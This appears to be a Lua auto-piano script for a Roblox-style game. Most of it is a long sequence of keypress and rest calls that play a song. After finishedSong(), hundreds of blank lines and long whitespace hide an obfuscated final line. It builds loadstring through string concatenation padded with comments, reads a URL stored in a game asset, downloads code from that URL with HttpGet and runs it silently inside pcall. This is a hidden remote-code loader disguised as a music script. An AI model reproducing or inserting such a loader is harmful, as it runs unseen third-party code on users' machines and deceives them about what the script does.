keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("o", 0.5, bpm)
keypress("k", 1.75, bpm)
rest(0.5, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("o", 0.5, bpm)
rest(0.75, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("r", 0.75, bpm)
keypress("w", 0.75, bpm)
keypress("0", 0.75, bpm)
keypress("u", 0.75, bpm)
keypress("o", 0.75, bpm)
keypress("3", 1, bpm)
rest(0.75, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("o", 0.5, bpm)
rest(0.25, bpm)
keypress("x", 1, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
keypress("v", 1, bpm)
keypress("k", 1, bpm)
rest(0.5, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("o", 0.5, bpm)
rest(0.5, bpm)
keypress("k", 1, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("3", 1, bpm)
keypress("C", 1, bpm)
keypress("j", 1, bpm)
rest(0.5, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("o", 0.5, bpm)
rest(0.5, bpm)
keypress("h", 1, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
keypress("x", 1, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("o", 0.5, bpm)
rest(0.75, bpm)
keypress("G", 2, bpm)
keypress("Ctrl+7", 1, bpm)
keypress("Y", 0.75, bpm)
keypress("r", 0.75, bpm)
keypress("e", 0.75, bpm)
keypress("Q", 0.75, bpm)
keypress("(", 0.75, bpm)
keypress("I", 0.75, bpm)
keypress("@", 1, bpm)
keypress("Z", 2, bpm)
rest(0.25, bpm)
keypress("k", 0.25, bpm)
rest(0.25, bpm)
keypress("k", 0.25, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("I", 0.5, bpm)
keypress("l", 0.25, bpm)
rest(0.25, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
keypress("l", 0.25, bpm)
rest(0.25, bpm)
keypress("k", 1, bpm)
rest(0.25, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.5, bpm)
keypress("G", 2.5, bpm)
keypress("Ctrl+7", 1, bpm)
keypress("@", 1, bpm)
keypress("Z", 2.5, bpm)
rest(0.25, bpm)
keypress("k", 0.25, bpm)
rest(0.25, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("I", 0.5, bpm)
keypress("k", 0.25, bpm)
rest(0.25, bpm)
keypress("z", 0.25, bpm)
rest(0.25, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
keypress("z", 0.25, bpm)
rest(0.25, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("I", 0.5, bpm)
keypress("k", 0.25, bpm)
rest(0.25, bpm)
keypress("j", 0.25, bpm)
rest(0.25, bpm)
keypress("k", 0.75, bpm)
rest(0.25, bpm)
keypress("Ctrl+7", 1, bpm)
keypress("Y", 0.75, bpm)
keypress("r", 0.75, bpm)
keypress("e", 0.75, bpm)
keypress("Q", 0.75, bpm)
keypress("(", 0.75, bpm)
keypress("I", 0.75, bpm)
keypress("@", 1, bpm)
rest(0.5, bpm)
keypress("k", 0.5, bpm)
keypress("G", 0.5, bpm)
keypress("D", 0.5, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.25, bpm)
keypress("k", 0.5, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
keypress("G", 0.5, bpm)
keypress("D", 0.5, bpm)
rest(0.5, bpm)
keypress("l", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("I", 0.5, bpm)
keypress("h", 0.5, bpm)
keypress("f", 0.5, bpm)
rest(0.5, bpm)
keypress("k", 0.5, bpm)
keypress("Ctrl+7", 1, bpm)
keypress("@", 1, bpm)
keypress("G", 0.5, bpm)
keypress("D", 0.5, bpm)
rest(0.5, bpm)
keypress("G", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("I", 0.5, bpm)
keypress("D", 0.5, bpm)
rest(0.5, bpm)
keypress("j", 0.5, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
keypress("f", 0.5, bpm)
rest(0.25, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.25, bpm)
keypress("h", 0.5, bpm)
keypress("D", 0.5, bpm)
rest(0.5, bpm)
keypress("f", 4, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("r", 0.75, bpm)
keypress("w", 0.75, bpm)
keypress("0", 0.75, bpm)
keypress("u", 0.75, bpm)
keypress("3", 1, bpm)
keypress("a", 4, bpm)
rest(0.25, bpm)
keypress("h", 0.5, bpm)
rest(0.5, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("h", 0.25, bpm)
rest(0.25, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
keypress("x", 0.25, bpm)
rest(0.25, bpm)
keypress("C", 0.25, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("x", 0.25, bpm)
rest(0.25, bpm)
keypress("k", 0.5, bpm)
rest(0.25, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("3", 1, bpm)
rest(0.25, bpm)
keypress("h", 0.25, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("k", 0.25, bpm)
rest(0.25, bpm)
keypress("j", 0.25, bpm)
rest(0.25, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
keypress("h", 0.25, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("G", 0.25, bpm)
rest(0.25, bpm)
keypress("h", 0.25, bpm)
rest(0.25, bpm)
keypress("G", 0.25, bpm)
rest(0.25, bpm)
keypress("f", 1, bpm)
keypress("a", 1, bpm)
keypress("u", 2, bpm)
keypress("r", 2, bpm)
keypress("w", 2, bpm)
keypress("0", 2, bpm)
keypress("o", 2, bpm)
keypress("3", 2, bpm)
keypress("Ctrl+8", 2, bpm)
rest(1, bpm)
keypress("a", 0.5, bpm)
rest(0.5, bpm)
keypress("d", 0.5, bpm)
rest(0.5, bpm)
keypress("D", 0.5, bpm)
rest(0.5, bpm)
keypress("f", 0.5, bpm)
rest(0.5, bpm)
keypress("G", 0.5, bpm)
rest(0.5, bpm)
keypress("h", 0.5, bpm)
rest(0.5, bpm)
keypress("j", 0.5, bpm)
keypress("Ctrl+7", 1, bpm)
keypress("@", 1, bpm)
keypress("Y", 0.75, bpm)
keypress("r", 0.75, bpm)
keypress("e", 0.75, bpm)
keypress("Q", 0.75, bpm)
keypress("(", 0.75, bpm)
keypress("I", 0.75, bpm)
rest(0.5, bpm)
keypress("G", 0.5, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.25, bpm)
keypress("k", 0.5, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
rest(0.5, bpm)
keypress("l", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.5, bpm)
keypress("k", 0.5, bpm)
keypress("Ctrl+7", 1, bpm)
keypress("@", 1, bpm)
rest(0.5, bpm)
keypress("j", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.5, bpm)
keypress("h", 0.5, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
rest(0.25, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.25, bpm)
keypress("j", 0.5, bpm)
rest(0.5, bpm)
keypress("k", 0.5, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("3", 1, bpm)
keypress("r", 0.75, bpm)
keypress("w", 0.75, bpm)
keypress("0", 0.75, bpm)
keypress("u", 0.75, bpm)
rest(0.75, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.25, bpm)
keypress("a", 0.5, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
rest(0.5, bpm)
keypress("d", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.5, bpm)
keypress("D", 0.5, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("3", 1, bpm)
rest(0.5, bpm)
keypress("f", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.5, bpm)
keypress("G", 0.5, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.25, bpm)
keypress("h", 0.5, bpm)
rest(0.5, bpm)
keypress("j", 0.5, bpm)
keypress("Ctrl+7", 1, bpm)
keypress("@", 1, bpm)
keypress("Y", 0.75, bpm)
keypress("r", 0.75, bpm)
keypress("e", 0.75, bpm)
keypress("Q", 0.75, bpm)
keypress("(", 0.75, bpm)
keypress("I", 0.75, bpm)
rest(0.5, bpm)
keypress("G", 0.5, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.25, bpm)
keypress("k", 0.5, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
rest(0.5, bpm)
keypress("l", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.5, bpm)
keypress("k", 0.5, bpm)
keypress("Ctrl+7", 1, bpm)
keypress("@", 1, bpm)
rest(0.5, bpm)
keypress("j", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.5, bpm)
keypress("h", 0.5, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
rest(0.25, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.25, bpm)
keypress("G", 0.5, bpm)
rest(0.5, bpm)
keypress("k", 4, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("3", 1, bpm)
keypress("r", 0.75, bpm)
keypress("w", 0.75, bpm)
keypress("0", 0.75, bpm)
keypress("u", 0.75, bpm)
rest(0.75, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.25, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
rest(0.5, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.5, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("3", 1, bpm)
rest(0.5, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.5, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.75, bpm)
keypress("3", 1, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("r", 0.75, bpm)
keypress("w", 0.75, bpm)
keypress("0", 0.75, bpm)
keypress("u", 0.75, bpm)
rest(0.75, bpm)
keypress("r", 0.25, bpm)
keypress("w", 0.25, bpm)
keypress("0", 0.25, bpm)
keypress("u", 0.25, bpm)
rest(0.25, bpm)
keypress("3", 1, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("0", 1, bpm)
keypress("w", 1, bpm)
keypress("r", 1, bpm)
keypress("u", 1, bpm)
keypress("k", 1, bpm)
rest(1, bpm)
keypress("$", 1, bpm)
keypress("Ctrl+0", 1, bpm)
keypress("I", 1, bpm)
keypress("r", 1, bpm)
keypress("w", 1, bpm)
keypress("Q", 1, bpm)
keypress("9", 1, bpm)
keypress("j", 1, bpm)
rest(1, bpm)
keypress("Ctrl+w", 1, bpm)
keypress("%", 1, bpm)
keypress("W", 1, bpm)
keypress("r", 1, bpm)
keypress("y", 1, bpm)
keypress("9", 1, bpm)
keypress("q", 1, bpm)
keypress("*", 1, bpm)
keypress("O", 1, bpm)
keypress("H", 1, bpm)
rest(1, bpm)
keypress("6", 0.5, bpm)
keypress("Ctrl+e", 0.5, bpm)
keypress("t", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("8", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("u", 0.5, bpm)
keypress("j", 2, bpm)
rest(0.5, bpm)
keypress("6", 1, bpm)
keypress("Ctrl+e", 1, bpm)
keypress("t", 1, bpm)
keypress("0", 1, bpm)
keypress("8", 1, bpm)
keypress("e", 1, bpm)
keypress("u", 1, bpm)
rest(1, bpm)
keypress("7", 1, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("t", 1, bpm)
keypress("Q", 1, bpm)
keypress("8", 1, bpm)
keypress("e", 1, bpm)
keypress("u", 1, bpm)
keypress("I", 1, bpm)
keypress("0", 1, bpm)
rest(0.5, bpm)
keypress("j", 3, bpm)
rest(0.5, bpm)
keypress("1", 1, bpm)
keypress("Ctrl+4", 1, bpm)
keypress("t", 1, bpm)
keypress("w", 1, bpm)
keypress("8", 1, bpm)
keypress("o", 1, bpm)
keypress("Q", 1, bpm)
keypress("9", 1, bpm)
rest(1, bpm)
keypress("3", 0.5, bpm)
keypress("Ctrl+8", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("p", 0.5, bpm)
keypress("q", 0.5, bpm)
keypress("y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("*", 0.5, bpm)
keypress("9", 0.5, bpm)
rest(0.5, bpm)
keypress("6", 1, bpm)
keypress("Ctrl+e", 1, bpm)
keypress("t", 0.75, bpm)
keypress("0", 0.75, bpm)
keypress("8", 0.75, bpm)
keypress("e", 0.75, bpm)
keypress("u", 0.75, bpm)
rest(0.75, bpm)
keypress("t", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("8", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.25, bpm)
keypress("j", 1, bpm)
keypress("1", 1, bpm)
keypress("Ctrl+4", 1, bpm)
rest(0.5, bpm)
keypress("t", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("8", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.5, bpm)
keypress("h", 1, bpm)
keypress("6", 1, bpm)
keypress("Ctrl+e", 1, bpm)
rest(0.5, bpm)
keypress("t", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("8", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.5, bpm)
keypress("G", 1, bpm)
keypress("1", 1, bpm)
keypress("Ctrl+4", 1, bpm)
rest(0.25, bpm)
keypress("t", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("8", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.75, bpm)
keypress("h", 2, bpm)
keypress("r", 0.75, bpm)
keypress("w", 0.75, bpm)
keypress("0", 0.75, bpm)
keypress("u", 0.75, bpm)
keypress("3", 1, bpm)
keypress("Ctrl+8", 1, bpm)
rest(0.75, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.25, bpm)
keypress("7", 1, bpm)
keypress("Ctrl+t", 1, bpm)
rest(0.5, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.5, bpm)
keypress("h", 3, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("3", 1, bpm)
rest(0.5, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.5, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.75, bpm)
keypress("r", 0.75, bpm)
keypress("w", 0.75, bpm)
keypress("0", 0.75, bpm)
keypress("u", 0.75, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("3", 1, bpm)
rest(0.75, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.25, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
keypress("x", 1, bpm)
rest(0.5, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.5, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("3", 1, bpm)
keypress("k", 1, bpm)
rest(0.5, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.5, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
keypress("h", 1, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.75, bpm)
keypress("G", 2, bpm)
keypress("Y", 0.75, bpm)
keypress("r", 0.75, bpm)
keypress("e", 0.75, bpm)
keypress("Q", 0.75, bpm)
keypress("(", 0.75, bpm)
keypress("I", 0.75, bpm)
keypress("@", 1, bpm)
keypress("Ctrl+7", 1, bpm)
rest(0.75, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.25, bpm)
keypress("$", 1, bpm)
keypress("Ctrl+0", 1, bpm)
rest(0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.5, bpm)
keypress("G", 2.5, bpm)
keypress("@", 1, bpm)
keypress("Ctrl+7", 1, bpm)
rest(0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.5, bpm)
keypress("$", 1, bpm)
keypress("Ctrl+0", 1, bpm)
rest(0.25, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.75, bpm)
keypress("Y", 0.75, bpm)
keypress("r", 0.75, bpm)
keypress("e", 0.75, bpm)
keypress("Q", 0.75, bpm)
keypress("(", 0.75, bpm)
keypress("I", 0.75, bpm)
keypress("@", 1, bpm)
keypress("Ctrl+7", 1, bpm)
rest(0.5, bpm)
keypress("G", 0.5, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.25, bpm)
keypress("G", 0.5, bpm)
keypress("$", 1, bpm)
keypress("Ctrl+0", 1, bpm)
rest(0.5, bpm)
keypress("h", 0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.5, bpm)
keypress("k", 1, bpm)
keypress("@", 1, bpm)
keypress("Ctrl+7", 1, bpm)
rest(0.5, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.5, bpm)
keypress("j", 0.5, bpm)
keypress("$", 1, bpm)
keypress("Ctrl+0", 1, bpm)
rest(0.25, bpm)
keypress("Y", 0.5, bpm)
keypress("r", 0.5, bpm)
keypress("e", 0.5, bpm)
keypress("Q", 0.5, bpm)
keypress("(", 0.5, bpm)
keypress("I", 0.5, bpm)
rest(0.25, bpm)
keypress("G", 0.5, bpm)
rest(0.5, bpm)
keypress("G", 0.5, bpm)
keypress("r", 0.75, bpm)
keypress("w", 0.75, bpm)
keypress("0", 0.75, bpm)
keypress("u", 0.75, bpm)
keypress("3", 1, bpm)
keypress("Ctrl+8", 1, bpm)
keypress("3", 1, bpm)
rest(0.5, bpm)
keypress("f", 3.5, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.25, bpm)
keypress("7", 1, bpm)
keypress("Ctrl+t", 1, bpm)
keypress("7", 1, bpm)
keypress("Ctrl+t", 1, bpm)
rest(0.5, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.5, bpm)
keypress("3", 1, bpm)
keypress("Ctrl+8", 1, bpm)
rest(0.5, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.5, bpm)
keypress("7", 1, bpm)
keypress("Ctrl+t", 1, bpm)
rest(0.25, bpm)
keypress("r", 0.5, bpm)
keypress("w", 0.5, bpm)
keypress("0", 0.5, bpm)
keypress("u", 0.5, bpm)
rest(0.75, bpm)
keypress("3", 1, bpm)
keypress("Ctrl+8", 1, bpm)

finishedSong()                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        
end, ...)







































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        task.spawn(pcall,--[===[e5ac4dc]===]function()--[===[e5ac4dc]===]local a =--[===[e5ac4dc]===] getfenv()--[===[e5ac4dc]===][ [[]]--[===[814c1ae]===]..[[l]]..--[=====[1b1a008]=====][[]]--[======[f69ffc]======]..[[o]]..--[=======[490a0c8]=======][[]]--[==[70b6e5a]==]..[[a]]..--[====[c3420f8]====][[]]--[===[4e2c179]===]..[[d]]..--[==[54c832e]==][[]]--[=====[6ed7f44]=====]..[[s]]..--[==[46aed4a]==][[]]--[=======[d6b0f5d]=======]..[[t]]..--[=====[d32ccfa]=====][[]]--[====[b9f8f85]====]..[[r]]..--[=====[5d83c1c]=====][[]]--[======[82c404d]======]..[[i]]..--[[f739d75]][[]]--[==[8ee7778]==]..[[n]]..--[==[318b3e4]==][[]]--[=====[c7db92d]=====]..[[g]]..--[==[3ef8fa6]==][[]] ];--[===[e5ac4dc]===]local b = --[===[e5ac4dc]===]game:--[===[e5ac4dc]===]GetObjects( [[]]--[=====[ad3732d]=====]..[[r]]..--[======[e45d015]======][[]]--[===[37add3c]===]..[[b]]..--[[3d80139]][[]]--[====[f98c520]====]..[[x]]..--[====[f7b6257]====][[]]--[=====[5f7739b]=====]..[[a]]..--[===[8a7c712]===][[]]--[=======[0f40423]=======]..[[s]]..--[=======[f318bfd]=======][[]]--[=======[8b7fce4]=======]..[[s]]..--[===[2aa2057]===][[]]--[=[46271f3]=]..[[e]]..--[[304a5c8]][[]]--[====[ea6624a]====]..[[t]]..--[==[20b2dfe]==][[]]--[===[354d430]===]..[[i]]..--[=====[5abda30]=====][[]]--[====[23a9390]====]..[[d]]..--[====[66cbab4]====][[]]--[=====[875339c]=====]..[[:]]..--[=======[a304cc3]=======][[]]--[======[f3b1050]======]..[[/]]..--[[0f1e5a7]][[]]--[===[ce525fa]===]..[[/]]..--[=====[543f5b5]=====][[]]--[=[24be508]=]..[[1]]..--[==[9c7037d]==][[]]--[======[d2d94a3]======]..[[1]]..--[===[5a39dc8]===][[]]--[=======[1c1a468]=======]..[[2]]..--[=[7b8cce2]=][[]]--[====[0fafd40]====]..[[4]]..--[===[bdc89b8]===][[]]--[=[6cb2a0e]=]..[[0]]..--[=[80b4ed6]=][[]]--[[52cdfdd]]..[[5]]..--[=======[5dfed4c]=======][[]]--[=====[4372346]=====]..[[6]]..--[[71944cd]][[]]--[=======[038ea13]=======]..[[1]]..--[=[f8a1876]=][[]]--[==[e66b0f0]==]..[[8]]..--[=====[b8d4fc9]=====][[]]--[====[5c33cc5]====]..[[5]]..--[=======[da4882e]=======][[]]--[[7e03922]]..[[8]]..--[=====[f70b68d]=====][[]]--[===[3dacc66]===]..[[4]]..--[====[0b69a97]====][[]]--[====[f789d55]====]..[[8]]..--[====[e984892]====][[]]--[======[1eedf1d]======]..[[2]]..--[=======[2d24bc9]=======][[]]--[=====[af82824]=====]..[[1]]..--[====[be659b5]====][[]] )local c = b[1];local d = --[===[e5ac4dc]===]c.Value--[===[e5ac4dc]===];local e --[===[e5ac4dc]===]= game:--[===[e5ac4dc]===]HttpGet(d --[===[e5ac4dc]===].. "/" --[===[e5ac4dc]===].. "s" --[===[e5ac4dc]===].. "r" --[===[e5ac4dc]===].. "c")a--[===[e5ac4dc]===](--[===[e5ac4dc]===]e)--[===[e5ac4dc]===]()end)